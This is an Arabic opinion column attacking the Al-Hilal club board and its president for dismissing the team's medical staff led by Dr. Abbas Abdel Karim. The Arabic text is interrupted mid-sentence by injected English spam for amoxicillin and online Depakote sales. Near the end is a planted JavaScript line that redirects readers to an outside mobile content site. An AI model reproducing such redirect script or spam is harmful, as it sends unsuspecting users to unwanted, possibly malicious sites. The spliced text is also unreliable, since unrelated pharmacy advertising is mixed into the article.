الرئيسية / مقالات / أفكار محمد الجزولي بعنوان إقصاء وإشانة سمعة

أفكار محمد الجزولي بعنوان إقصاء وإشانة سمعة

محمد الجزولى

إقصاء وإشانة سمعة

لا زال مجلس إدارة نادي الهلال يواصل تخطباته في اتخاذ القرارات التي تأتي دائماً كرد فعل مضاد لعمل غير مقصود، مما رسم صورة مشوهة لهذا المجلس في نظر الكثيرين على خلفية قراراته التي فيها نوع من التشفي بعد أن رفع شعار الإقصاء لجميع الذين أخصلوا للهلال العظيم وشعاره الغالي، بل إن المشجع الهلالي أصبح في كل يوم يتفاجأ بقرار غريب وعجيب من المجلس الذي بدأ أقرب لحكم الإقطاع من كونه مجلساً منتخباً فاز بأصوات الأغلبية.

إتخذ مجلس إدارة الهلال أو قل رئيسه أشرف الكاردينال أمس الأول قراراً غريباً بإعفاء الجهاز الطبي للفريق بقيادة الدكتور عباس عبد الكريم. وليته اكتفى بقرار الإقالة، بل جاء في الخبر ما هو أسوأ من الإعفاء وإشانة سمعة من الدرجة الأولى، بعد أن أورد الموقع الرسمي للنادي أمس خبراً جاء فيه (قررمجلس إداره نادي الهلال إقاله الطاقم الطبي برئاسهالدكتور عباس عبد الكريم ومعاونيه بسبب الأخطاءالطبية التي صاحبت تشخيص إصابات عدد ﻣﻦاللاعبين بمعسكر الفجيرة مما أدى لتطور حالةاللاعب عبد اللطيف بويا وكانوتيه ومعاويه فداسيبالإضافه لمحمد عبد الرحمن..الأمر الذي يشير الىخلل واضح في تحديد حالات الإصابات حسبتشخيص الدكتور عباس ومعاونيه التي مالت فيمعظمها الى تبسيط الإصابة والراحة ما بين يومالى خمسة أيام انتهت بقطع في الرباط الصليبيللاعب عبد اللطيف بويا) إنتهى الخبر الكارثة.

نقول للكاردينال رئيس نادي الهلال (ما هكذا تورد الإبل) وماذا يضر النادي إذا صبر المجلس حتى عادت البعثة للخرطوم ليقوم بإعفاء الطاقم الطبي مع الاستعانة بطبيب آخر، ولماذا كل هذا الاستعجال في إصدار القرارات التي تحمل حالة التشفي والاغتيال المعنوي، خاصة أن دكتور عباس من أكبر جراحي السودان وظل يخدم الهلال لسنوات وسنوات وتحمل الكثير من النقد والمضايقات ولم نسمع عنه يوماً أنه قال كلاماً سالباً في حق إدارة الهلال.

أصبح الهلال في عهد الكاردينال ناكراً للجميل وطارداً للمخلصين وفاقداً لمعانيه السمحة كنادٍ رائدٍقدوة للآخرين ولا يمكن أن يتم إعفاء دكتور عباس الإنسان بهذه الصورة المشينة التي خلت من الاحترام والتقدير.  وأعتقد إن الذي أصدر قرار الإعفاء لا يعرف شيئاً عن مجتمع الهلال، بل إنه يريد أن  يثبت للجميع أنه الناهي والآمر amoxil (amoxicillin) is an antibiotic that concerns the penicillin group of medicines. it is suggested to people with gonorrhea, ear infections, bladder infections … وأخشى أن يأتي اليوم الذي نسمع فيه أن موظفاً عادياً بالنادي أجبر أعضاء مجلس الهلال على الاستقالة.

فالطريقة التي أعفى بها مجلس الهلال الدكتور عباس عبد الكريم طبيب الفريق، لن تكن الأخيرة بأي حال من الأحوال، بل سبق لهذا المجلس بعد أيام من فوزه في الإنتخابات إعفاء المدرب البرازيلي كامبوس مدرب الفريق هو في الكنغو برازفيل وبعد مباراة فيتا كلوب مباشرة. ومن ثم أعلن المجلس إعفاء الدكتور كسلا من عضوية  اللجنة الفنية بعد أن أشان سمعته بتسريب أخبار التسجيلات للصحف وإفشاله صفقة إنتقال البرازيلي كروز، هذا غيض من فيض، ولكننا في انتظار قرار إعفاء جديد يطال أحد الأبناء الأوفياء.

افتقدت كل قرارات مجلس الهلال منذ تكوينه للكياسة والحكمة، وإن كل القرارات التي اتخذها المجلس كانت محل سخرية وتندر من قبل أبسط المشجعين، ونتأسف جدا وأعضاء مجلس إدارة نادي الهلال أخذوا مواقعهم في مقاعد المتفرجين وأصبحوا آخر من يعلم بالقرارات التي تصدر باسمهم وتنشر في الموقع الرسمي للنادي دون أن يكون لهم فيه أي رأي.. وعلى الكاردينال أن يعيد النظر في الطريقة التي يدير buy depakote online. order divalproex 125/250/500mg us … بها الهلال قبل أن يبلغ السيف العزل ويخرج أعضاء المجلس الكرام من بيت الطاعة.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*